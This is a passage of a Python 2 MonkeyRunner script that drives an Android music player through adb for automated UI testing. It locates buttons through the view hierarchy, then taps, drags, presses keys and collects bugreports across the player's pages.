\"\"\"\n print('Begin to connectToDevice %s' %deviceID)\n try:\n self.device = MR.waitForConnection(timeout, deviceID)\n #print type(self.device)\n except:\n print('device is '+ str(self.device)+str(Exception))\n os.system(\"adb -s \" + deviceID + \" start-server\")\n print('begin to reconnectToDevice %s' %deviceID)\n self.device = MR.waitForConnection(timeout, deviceID)\n if not self.device:\n print('fail to connectDevice')\n sys.exit()\n\n def getDeviceList(self):\n \"\"\"\n get device_list in adb devices\n \"\"\"\n print('##############getDeviceList##############')\n cmd = 'adb devices'\n dl = os.popen(cmd)\n for line in dl.readlines():\n if 'device' in line:\n if 'List' not in line:\n line = line[:16]\n #print(line)\n self.device_list.append(line)\n\n def getProductType(self):\n \"\"\"\n get product type\n \"\"\"\n print('##############getProductType##############')\n cmd = 'adb -s '+ self.deviceID +' shell getprop | grep ro.product.name'\n result = os.popen(cmd)\n result = result.readline().split(':')\n product = result[len(result)-1].replace('[','')\n product = product.replace(']','')\n product = product.replace(' ','').strip()\n return product\n\n def getRomType(self):\n \"\"\"\n get rom type\n \"\"\"\n print('##############getRomType##############')\n cmd = 'adb -s '+ self.deviceID +' shell getprop | grep ro.product.mod_device'\n result = os.popen(cmd)\n n_result = result.readline()\n if n_result == '':\n rom_type = ''\n else:\n result = n_result.split(':')\n rom_type = result[len(result)-1].replace('[','')\n rom_type = rom_type.replace(']','').strip()\n return rom_type\n\n def getPhoneType(self):\n \"\"\"\n get phone type\n \"\"\"\n print('##############getPhoneType##############')\n product = self.getProductType()\n rom = self.getRomType()\n phone_type = ''\n if product == 'wt93007':\n if rom == '':\n phone_type = 'hm2'\n self.phone = phone_type\n\n def unLock(self):\n \"\"\"\n unlock phone\n \"\"\"\n device = self.device\n print('##############unLock##############')\n self.lockPhone()\n self.wakePhone()\n time.sleep(2)\n device.press(self.Key_Code['KEYCODE_BACK'], MD.DOWN)\n device.press(self.Key_Code['KEYCODE_VOLUME_UP'], MD.DOWN_AND_UP)\n device.press(self.Key_Code['KEYCODE_BACK'], MD.UP)\n time.sleep(2)\n\n def pressKey(self,key='',type=0):\n \"\"\"\n press key\n \"\"\"\n print('pressKey---%s'%key)\n device = self.device\n if type == 1:\n device.press(key,MD.DOWN)\n elif type == 2:\n device.press(key,MD.UP)\n else :\n device.press(key,MD.DOWN_AND_UP)\n time.sleep(1)\n\n def wakePhone(self):\n \"\"\"\n wake phone\n \"\"\"\n device = self.device\n print('##############wakePhone##############')\n device.wake()\n time.sleep(1)\n\n def lockPhone(self):\n \"\"\"\n lock phone\n \"\"\"\n device = self.device\n print('##############lockPhone##############')\n device.press(self.Key_Code['KEYCODE_POWER'], MD.DOWN_AND_UP)\n time.sleep(1)\n\n def lauchPlayer(self):\n \"\"\"\n lauch music player\n \"\"\"\n device_id = self.deviceID\n print('##############lauchPlayer##############')\n activity_name = self.activity_name\n cmd = 'adb -s ' + device_id + ' shell am start -n ' + activity_name\n os.popen(cmd)\n print('lauchPlayer | please wait 5 sec')\n time.sleep(5)\n\n def killPlayer(self):\n \"\"\"\n kill music player\n \"\"\"\n device_id = self.deviceID\n print('##############killPlayer##############')\n package_name = self.package_name\n Popen(['adb', '-s', device_id, 'shell', 'am', 'kill',package_name ]).wait()\n Popen(['adb', '-s', device_id, 'shell', 'am', 
'force-stop',package_name]).wait()\n time.sleep(1)\n self.pressKey(self.Key_Code['KEYCODE_HOME'])\n time.sleep(1)\n\n def touchButton(self,phone = '',page = '',button = ''):\n \"\"\"\n touch buttons\n \"\"\"\n print('touchButton--%s--%s'%(page,button))\n point = self.button_pos[phone][page][button]\n self.touchDevice(point['x'], point['y'])\n time.sleep(2)\n\n def touchDevice(self,x=0,y=0):\n \"\"\"\n device touch action\n \"\"\"\n device = self.device\n print('touchDevice--(%d,%d)'%(x,y))\n device.touch(x,y,MD.DOWN_AND_UP)\n time.sleep(3)\n\n def touchConfirmCancel(self,tt=''):\n \"\"\"\n touchConfirmCancel\n \"\"\"\n print('touchConfirmCancel--%s'%tt)\n phone = self.phone\n button = self.confirm_cancel[phone][tt]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n\n def dragDevice(self,orig_x=0,orig_y=0,to_x=0,to_y=0):\n \"\"\"\n drag action\n \"\"\"\n device = self.device\n start = (orig_x,orig_y)\n end = (to_x,to_y)\n duration = 0.2\n steps = 10\n time.sleep(1)\n device.drag(start, end, duration, steps)\n time.sleep(2)\n\n def inputText(self):\n \"\"\"\n inputText\n \"\"\"\n device = self.device\n txt = ''\n chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'\n length = len(chars) - 1\n random_length = random.randint(2,8)\n for i in range(random_length):\n txt+=chars[random.randint(0, length)]\n print('######inputText:%s'%txt)\n shell_text = 'input text ' + txt\n device.shell(shell_text)\n time.sleep(2)\n\n def longPress(self,phone='',page='',button=''):\n \"\"\"\n longPress\n \"\"\"\n print('longPress--%s,%s'%(page,button))\n device = self.device\n point = self.button_pos[phone][page][button]\n orig_x = point['x']\n orig_y = point['y']\n start = (orig_x,orig_y)\n end = (orig_x,orig_y)\n duration = 1\n steps = 10\n device.drag(start, end, duration, steps)\n time.sleep(1)\n\n def dragPage(self,direct='left'):\n \"\"\"\n drag action\n \"\"\"\n print('##############dragPage:%s##############'% direct)\n d_width,d_height = self.getDeviceWH()\n orig_x = d_width/3\n orig_y = d_height/3\n to_x = d_width*2/3\n to_y = d_height/3\n if direct == 'left':\n orig_x = d_width/3\n orig_y = d_height*2/3\n to_x = d_width*2/3\n to_y = d_height*2/3\n elif direct == 'right':\n orig_x = d_width*2/3\n orig_y = d_height*2/3\n to_x = d_width/3\n to_y = d_height*2/3\n elif direct == 'top':\n orig_x = d_width/2\n orig_y = d_height/3\n to_x = d_width/2\n to_y = d_height*2/3\n elif direct == 'bottom':\n orig_x = d_width/2\n orig_y = d_height*2/3\n to_x = d_width/2\n to_y = d_height/3\n self.dragDevice(orig_x,orig_y,to_x,to_y)\n\n def getDeviceWH(self):\n \"\"\"\n get device height and width\n \"\"\"\n print('--getDeviceWH--')\n device = self.device\n d_width = int(device.getProperty('display.width'))\n d_height = int(device.getProperty('display.height'))\n return d_width,d_height\n\n def getTime(self,time_format=''):\n \"\"\"\n get time in format like 2013-3-3\n \"\"\"\n time_value = ''\n year,mon,day= time.strftime('%Y'),time.strftime('%m'),time.strftime('%d')\n hms = time.strftime('%H-%M-%S')\n block = '-'\n mon = str(int(mon))\n day = str(int(day))\n ymd = year + block + mon + block + day\n ymd_hms = ymd + '-' + hms\n if time_format == 'ymd':\n time_value = ymd\n else:\n time_value = ymd_hms\n return time_value\n\n def getLog(self):\n \"\"\"\n get device height and width\n \"\"\"\n phone = self.phone\n print('##############getLog:%s##############'% phone)\n device_id = self.deviceID\n phone = string.upper(phone)\n print('Begin get bugreport')\n ymd = self.getTime('ymd')\n ymd_hms = 
self.getTime('ymd_hms')\n log_name = phone + '-' + ymd_hms + '-log.txt'\n cmd = 'adb -s ' + device_id + ' bugreport > ' + log_name\n os.system(cmd)\n path_name = ymd + '/'\n path_exist = os.path.exists(path_name)\n if not path_exist:\n print('Make dir %s: '% ymd)\n os.mkdir(ymd)\n print('Move log file %s to dir: %s.'%(log_name,path_name))\n cmd_mv_log = 'mv ' + log_name + ' ' + path_name\n os.popen(cmd_mv_log)\n print('End get bugreport')\n print('Begin analyse bugreport')\n jar = 'java -jar chkbugreport.jar '\n log_file = path_name + log_name\n bugreport_analyse = jar + log_file\n os.popen(bugreport_analyse)\n print('End analyse bugreport')\n\n def getViewPoint(self,phone='',page = ''):\n \"\"\"\n get view point value\n \"\"\"\n device = self.device\n hms = time.strftime('%H:%M:%S')\n print('##############getViewPoint:phone=%s,page=%s @ time %s##############'%(phone,page,hms))\n time.sleep(1)\n d_width,d_height = self.getDeviceWH()\n menu_height = 0\n eof = False\n if page in self.page_list and phone in self.phone_list:\n eof = True\n if not eof:\n print('##############Incorrect page or phone##############')\n return False\n else:\n viewer = device.getHierarchyViewer()\n viewer_type = type(viewer)\n #print(v_type)\n if viewer_type:\n id = self.id_list[phone][page]\n #print(id)\n find_by_id = viewer.findViewById(id)\n fbi_type = type(find_by_id)\n #print(f_type)\n time.sleep(2)\n if fbi_type:\n buttons = []\n buttons_names = self.button_list[phone][page]\n if page == 'musichome':\n #'musichome':['main_play_button','songs','singers','albums','folders','playlists','online'],\n buttons.append(find_by_id.children[6].children[0])\n for j in xrange(2):\n for i in xrange(3):\n buttons.append(find_by_id.children[5].children[2].children[0].children[j].children[i])\n elif page == 'nowplaying':\n #'nowplaying':['home','equalizer','prev','pause','next','repeat','toggle'],\n for i in xrange(len(buttons_names)):\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n #'nowplaying':['up','playlist_indicator','repeat','repeat','favorite','info','prev','pause','next'],\n elif page == 'songs':\n #'songs':['home','toggle','randomplayall','randomsong',],\n child = len(find_by_id.children)\n if child >6:\n child = 6\n rnd = random.randint(1,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n if 'all' in page:\n buttons.append(find_by_id.children[0])\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'singers':\n #'singers':['home','toggle','randomsinger',],\n child = len(find_by_id.children)\n if child >6:\n child = 6\n rnd = random.randint(0,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'albums':\n #'albums':['home','toggle','randomalbum',],\n child = len(find_by_id.children)\n if child >6:\n child = 6\n rnd = random.randint(0,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'folders':\n #'folders':['home','toggle','randomfolder',],\n child = len(find_by_id.children)\n if child > 6:\n child = 6\n rnd = random.randint(0,child-1)\n for i in xrange(len(buttons_names)):\n if 'random' not in buttons_names[i]:\n 
ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n buttons.append(find_by_id.children[rnd])\n elif page == 'playlists':\n #'playlists':['home','toggle','favorite','recentlyplayed','recentlyadded','mostplayed','newlist',]\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 'id/'+buttons_names[i]\n buttons.append(viewer.findViewById(ids))\n else:\n if i < (len(buttons_names)-1):\n buttons.append(find_by_id.children[i-2])\n else:\n ids = 'id/'+ 'v5_icon_menu_bar_primary_item'\n buttons.append(viewer.findViewById(ids))\n elif page == 'online':\n #'online':['home','toggle','input','more_albums','new_albums','more_artists','hot_artists',],\n for i in xrange(len(buttons_names)):\n ids = 'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n if i < 4 or i == 5:\n buttons.append(list_view)\n else:\n rnd = 0\n if i == 4:\n rnd = random.randint(0,5)\n elif i == 6:\n rnd = random.randint(0,2)\n buttons.append(list_view.children[0].children[1].children[rnd].children[0])\n elif page == 'singer_detail':\n #'singer_detail':['all_songs','random_album'],\n #'singer_detail':'id/list',# 0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'album_detail':\n #'album_detail':['randomplayall','randomsong'],\n #'album_detail':'id/list',#0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'folder_detail':\n #'folder_detail':['randomplayall','randomsong'],\n #'folder_detail':'id/list',#0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'playlist_detail':\n #'playlist_detail':['randomplayall',],\n #'playlist_detail':'id/list',#0 rnd\n child = len(find_by_id.children)\n if child >6:\n child = 6\n buttons.append(find_by_id.children[0])\n rnd = random.randint(1,child-1)\n buttons.append(find_by_id.children[rnd])\n elif page == 'billboard':\n #'billboard':['random_billboard'],\n #'billboard':'id/view_pager',#children[1].children[1].children[rnd]\n child = len(find_by_id.children[1].children[1].children)\n rnd = random.randint(0,1)\n buttons.append(find_by_id.children[1].children[1].children[rnd])\n elif page == 'fm':\n #'fm':['random_fm'],\n #'fm':'id/view_pager',#children[2].children[1].children[rnd]\n child = len(find_by_id.children[2].children[1].children)\n if child >6:\n child = 6\n rnd = random.randint(0,child-1)\n buttons.append(find_by_id.children[2].children[1].children[rnd])\n elif page == 'online_album_detail':\n #'online_album_detail':['home','toggle','play_all','download_single',],\t\t\t\t#28\n child = len(find_by_id.children)\n if child < 6:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n rnd = random.randint(0,1)\n if rnd == 0:\n directs = 'top'\n else:\n directs = 'bottom'\n self.dragPage(directs)\n page = self.page_dict['online_more_albums_random']\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_album_detail']\n self.getViewPoint(phone,page)\n else:\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n buttons.append(list_view)\n elif i == 2:\n buttons.append(find_by_id.children[4])\n 
elif i == 3:\n buttons.append(find_by_id.children[5].children[1])\n elif page == 'online_singer_songs':\n #'online_singer_songs':['home','toggle','play_all','download_single',],\n # #30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n child = len(find_by_id.children[0].children[1].children)\n if child < 6:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n rnd = random.randint(0,1)\n if rnd == 0:\n directs = 'top'\n else:\n directs = 'bottom'\n self.dragPage(directs)\n page = self.page_dict['online_more_singers_random']\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_singer_songs']\n self.getViewPoint(phone,page)\n else:\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n buttons.append(list_view)\n elif i == 2:\n buttons.append(find_by_id.children[0].children[1].children[4])\n elif i == 3:\n buttons.append(find_by_id.children[0].children[1].children[5].children[1])\n elif page == 'online_singer_albums':\n #'online_singer_albums':['home','toggle','album',],\n # \t\t#32 children[1].children[1].children[0] first\n for i in xrange(len(buttons_names)):\n if i < 2:\n ids = 'id/'+buttons_names[i]\n list_view = viewer.findViewById(ids)\n buttons.append(list_view)\n elif i == 2:\n child = len(find_by_id.children[1].children[1].children)\n if child >6 :\n child = 6\n rnd = random.randint(0,child-1)\n buttons.append(find_by_id.children[1].children[1].children[rnd])\n elif page == 'online_more_albums_random':\n #'online_more_albums_random':['random_albums'],\n rnd = random.randint(0,8)\n buttons.append(find_by_id.children[rnd])\n elif page == 'online_more_singers_random':\n #'online_more_singers_random':['random_singers'],\n rnd = random.randint(0,8)\n buttons.append(find_by_id.children[rnd])\n elif 'menu' in page:\n #fl.children, len(fl.children)\n child = len(find_by_id.children)\n buttons.append(child)\n tmp = find_by_id.children[child-1]\n menu_height = tmp.height\n buttons.append(menu_height)\n if 'menu' in page:\n menu_count = buttons[0]\n menu_height = buttons[1]\n print('%s_count--%d'%(page,menu_count))\n for i in xrange(menu_count):\n x = d_width/2\n num = i*menu_height + (menu_height/2)\n y = d_height - num\n key = buttons_names[menu_count-i-1]\n print('menu(%s,%s)##############%d'%(key,page,i))\n self.button_pos[phone][page][key] = {'x':x,'y':y}\n else:\n long =len(buttons)\n for i in xrange(long):\n point = viewer.getAbsoluteCenterOfView(buttons[i])\n x = point.x\n y = point.y\n key = buttons_names[i]\n print('%s,%s##############%d'%(key,page,i))\n self.button_pos[phone][page][key] = {'x':x,'y':y}\n print('##############Finishi getViewPoint: %s##############'% page)\n else:\n return False\n time.sleep(2)\n\n def getButtons(self):\n \"\"\"\n logic to get button pos\n \"\"\"\n print('##############getButtons##############')\n #init to start\n self.getPhoneType()\n d_width,d_height = self.getDeviceWH()\n self.unLock()\n phone = self.phone\n page_list = self.page_list\n self.killPlayer()\n #home page\n self.lauchPlayer()\n page = page_list[0]\n self.getViewPoint(phone,page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n #home page menu\n page = page_list[1]\n self.getViewPoint(phone,page)\n self.killPlayer()\n #nowplaying page\n x = d_width/2\n y = d_height/3\n self.lauchPlayer()\n self.touchDevice(x,y)\n for i in xrange(2):\n self.dragPage('left')\n self.dragPage('right')\n self.touchDevice(x,y)\n page = 
page_list[2]\n self.getViewPoint(phone,page)\n #nowplaying page menu\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = page_list[3]\n self.getViewPoint(phone,page)\n self.killPlayer()\n #song list page | singers list page | album list page | folder list page | song play list page | online song list page\n page = page_list[0]\n button_list = self.button_list\n for i in xrange(6):\n #'musichome':['main_play_button','songs','singers','albums','folders','playlists','online'],\n print('i##############%d'% i)\n button = button_list[phone][page][i+1]\n self.lauchPlayer()\n self.touchButton(phone,page,button)\n i_page = page_list[i*2+4]\n print('w_page##############%s'% i_page)\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n j_page = page_list[i*2+5]\n print('j_page##############%s'% j_page)\n self.getViewPoint(phone,j_page)\n self.killPlayer()\n for i in xrange(6):\n page = page_list[0]\n if i < 5:\n button = button_list[phone][page][i+2]\n else:\n button = button_list[phone][page][i+1]\n self.lauchPlayer()\n self.touchButton(phone,page,button)\n if i < 4:\n page = page_list[i*2+6]\n if i ==3 :\n #'playlist_detail':'id/list',#0 rnd\n rnd = 5#mostplayed\n button = button_list[phone][page][rnd]\n else:\n button = button_list[phone][page][len(button_list[phone][page])-1]\n #'singer_detail':'id/list',# 0 rnd\n #'album_detail':'id/list',#0 rnd\n #'folder_detail':'id/list',#0 rnd\n self.touchButton(phone,page,button)\n i_page = page_list[i*2+16]\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n #'singer_detail_menu':'id/expanded_menu',\n #'album_detail_menu':'id/expanded_menu',\n #'folder_detail_menu':'id/expanded_menu',\n #'playlist_detail_menu':'id/expanded_menu',\n j_page = page_list[i*2+17]\n self.getViewPoint(phone,j_page)\n elif i == 4:\n #'billboard':'id/view_pager',#children[1].children[1].children[rnd]\n #'billboard_menu':'id/expanded_menu',\n self.dragPage('right')\n i_page = page_list[i*2+16]\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n j_page = page_list[i*2+17]\n self.getViewPoint(phone,j_page)\n else:\n #'fm':'id/view_pager',#children[2].children[1].children[rnd]\n #'fm_menu':'id/expanded_menu',\n self.dragPage('right')\n self.dragPage('right')\n i_page = page_list[i*2+16]\n self.getViewPoint(phone,i_page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n j_page = page_list[i*2+17]\n self.getViewPoint(phone,j_page)\n self.killPlayer()\n for i in xrange(2):\n self.lauchPlayer()\n page = self.page_dict['musichome']\n button = self.button_list[phone][page][6]\n self.touchButton(phone,page,button)\n page = self.page_dict['online']\n button = self.button_list[phone][page][i*2+3]\n self.touchButton(phone,page,button)\n time.sleep(10)\n if i == 0:\n page = self.page_dict['online_more_albums_random']\n else:\n page = self.page_dict['online_more_singers_random']\n self.getViewPoint(phone,page)\n self.killPlayer()\n for i in xrange(3):\n self.lauchPlayer()\n page = self.page_dict['musichome']\n button = self.button_list[phone][page][6]\n self.touchButton(phone,page,button)\n if i == 0:\n page = self.page_dict['online']\n button = self.button_list[phone][page][3]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_albums_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n time.sleep(10)\n page = 
self.page_dict['online_album_detail']\n self.getViewPoint(phone,page)\n page = self.page_dict['online_album_detail_menu']\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n self.getViewPoint(phone,page)\n elif i == 1:\n page = self.page_dict['online']\n button = self.button_list[phone][page][5]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_singers_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n time.sleep(10)\n page = self.page_dict['online_singer_songs']\n self.getViewPoint(phone,page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['online_singer_songs_menu']\n self.getViewPoint(phone,page)\n elif i == 2:\n page = self.page_dict['online']\n button = self.button_list[phone][page][5]\n self.touchButton(phone,page,button)\n page = self.page_dict['online_more_singers_random']\n rnd = random.randint(1,3)\n print('dragPage:%d times'%rnd)\n for i in xrange(rnd):\n self.dragPage('bottom')\n button = self.button_list[phone][page][0]\n self.touchButton(phone,page,button)\n time.sleep(10)\n self.dragPage('right')\n page = self.page_dict['online_singer_albums']\n self.getViewPoint(phone,page)\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['online_singer_albums_menu']\n self.getViewPoint(phone,page)\n self.killPlayer()\n self.pressKey(self.Key_Code['KEYCODE_HOME'])\n self.lockPhone()\n\n def pageTest(self,p_type=''):\n \"\"\"\n pageTest\n \"\"\"\n print('##############pageTest:%s##############'%p_type)\n self.lauchPlayer()\n phone = self.phone\n button_list = self.button_list\n d_width,d_height= self.getDeviceWH()\n if p_type == 'nowplaying':#2\n ###nowplaying page\n page = self.page_dict['musichome']\n button = button_list[phone][page][0]#musichome--main_play_button\n self.touchButton(phone,page,button)\n self.touchDevice(d_width/2,d_height/3)\n self.touchDevice(d_width/2,d_height/3)\n self.dragPage(direct='left')#nowplaying--list page\n self.dragPage(direct='right')#nowplaying--album page\n self.dragPage(direct='right')#nowplaying--lyric page\n self.dragPage(direct='left')#nowplaying--album page\n page = self.page_dict['nowplaying']\n button = button_list[phone][page][1]#nowplaying--equalizer\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][2]#nowplaying--prev\n self.touchButton(phone,page,button)\n button = button_list[phone][page][3]#nowplaying--pause\n for i in xrange(2):\n self.touchButton(phone,page,button)\n button = button_list[phone][page][4]#nowplaying--next\n self.touchButton(phone,page,button)\n button = button_list[phone][page][5]#nowplaying--repeat\n for i in xrange(2):\n self.touchButton(phone,page,button)\n button = button_list[phone][page][6]#nowplaying--toggle(favorite)\n for i in xrange(1):\n self.touchButton(phone,page,button)\n for i in xrange(6):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['nowplaying_menu']\n button = button_list[phone][page][i]#nowplaying_menu--delete--addto--modify--sendto--sleepmode--settings\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['nowplaying']\n button = button_list[phone][page][0]#nowplaying--home\n self.touchButton(phone,page,button)\n elif p_type == 'songs':#4\n ###songs page\n page = self.page_dict['musichome']\n button = 
button_list[phone][page][1]#musichome--songs\n self.touchButton(phone,page,button)\n page = self.page_dict['songs']\n button = button_list[phone][page][2]#songs--randomplayall\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][3]#songs--randomsong\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n button = button_list[phone][page][1]#songs--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n page = self.page_dict['songs']\n button = button_list[phone][page][2]#songs--randomplayall\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-4'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(4):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['songs_menu']\n button = button_list[phone][page][i]#songs_menu--id3--addto--sleepmode--settings\n self.touchButton(phone,page,button)\n if i != 0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['songs']\n button = button_list[phone][page][0]#songs--home\n self.touchButton(phone,page,button)\n elif p_type == 'singers':#6\n ###singers page\n page = self.page_dict['musichome']\n button = button_list[phone][page][2]#musichome--singers\n self.touchButton(phone,page,button)\n page = self.page_dict['singers']\n button = button_list[phone][page][2]#singers--randomsinger\n self.touchButton(phone,page,button)\n page = self.page_dict['singer_detail']\n button = button_list[phone][page][0]#singer_detail--all_songs\n self.touchButton(phone,page,button)\n page = self.page_dict['songs']\n button = button_list[phone][page][2]#songs--randomplayall\n self.touchButton(phone,page,button)\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['singers']\n button = button_list[phone][page][1]\n self.touchButton(phone,page,button)#singers--toggle\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n page = self.page_dict['singers']\n button = button_list[phone][page][2]#singers--randomsinger\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-3'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['singers_menu']\n button = button_list[phone][page][i]#singers_menu--photo--sleepmode--settings\n self.touchButton(phone,page,button)\n if i != 0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['singers']\n button = button_list[phone][page][0]#singers--home\n self.touchButton(phone,page,button)\n elif p_type == 'albums':#8\n ###albums page\n page = self.page_dict['musichome']\n button = button_list[phone][page][3]#musichome--albums\n self.touchButton(phone,page,button)\n page = self.page_dict['albums']\n button = 
button_list[phone][page][2]#albums--randomalbum\n self.touchButton(phone,page,button)\n page = self.page_dict['album_detail']\n button = button_list[phone][page][0]#album_detail--randomplayall\n self.touchButton(phone,page,button)\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['albums']\n button = button_list[phone][page][1]#albums--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n page = self.page_dict['albums']\n button = button_list[phone][page][2]#albums--randomalbum\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-3'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['albums_menu']\n button = button_list[phone][page][i]#albums_menu--cover--sleepmode--settings\n self.touchButton(phone,page,button)\n if i != 0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['albums']\n button = button_list[phone][page][0]#albums--home\n self.touchButton(phone,page,button)\n elif p_type == 'folders':#10\n ###folders page\n page = self.page_dict['musichome']\n button = button_list[phone][page][4]#musichome--folders\n self.touchButton(phone,page,button)\n page = self.page_dict['folders']\n button = button_list[phone][page][2]#folders--randomfolder\n self.touchButton(phone,page,button)\n page = self.page_dict['folder_detail']\n button = button_list[phone][page][0]#folder_detail--randomplayall\n self.touchButton(phone,page,button)\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['folders']\n button = button_list[phone][page][1]#folders--toggle\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(3):\n page = self.page_dict['folders']\n button = button_list[phone][page][2]#folders--randomfolder\n self.longPress(phone,page,button)#enter edit mode\n button = self.edit_mode_button[phone]['top']['1']#select all\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n j = str(i)\n button = self.edit_mode_button[phone]['bottom-3'][j]\n x = button['x']\n y = button['y']\n self.touchDevice(x,y)\n if i ==0:\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n else:\n for k in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n for i in xrange(2):\n self.pressKey(self.Key_Code['KEYCODE_MENU'])\n page = self.page_dict['folders_menu']\n button = button_list[phone][page][i]#folders_menu--sleepmode--settings\n self.touchButton(phone,page,button)\n self.pressKey(self.Key_Code['KEYCODE_BACK'])\n page = self.page_dict['folders']\n button = button_list[phone][page][0]#folders--home\n self.touchButton(phone,page,button)\n elif p_type == 'playlists':#12\n ###play lists page\n page = self.page_dict['musichome']\n button = button_list[phone][page][5]#musichome--playlists\n self.touchButton(phone,page,button)\n page = self.page_dict['playlists']\n button = button_list[phone][page][2]#playlists--favorite list\n self.touchButton(phone,page,button)\n page = 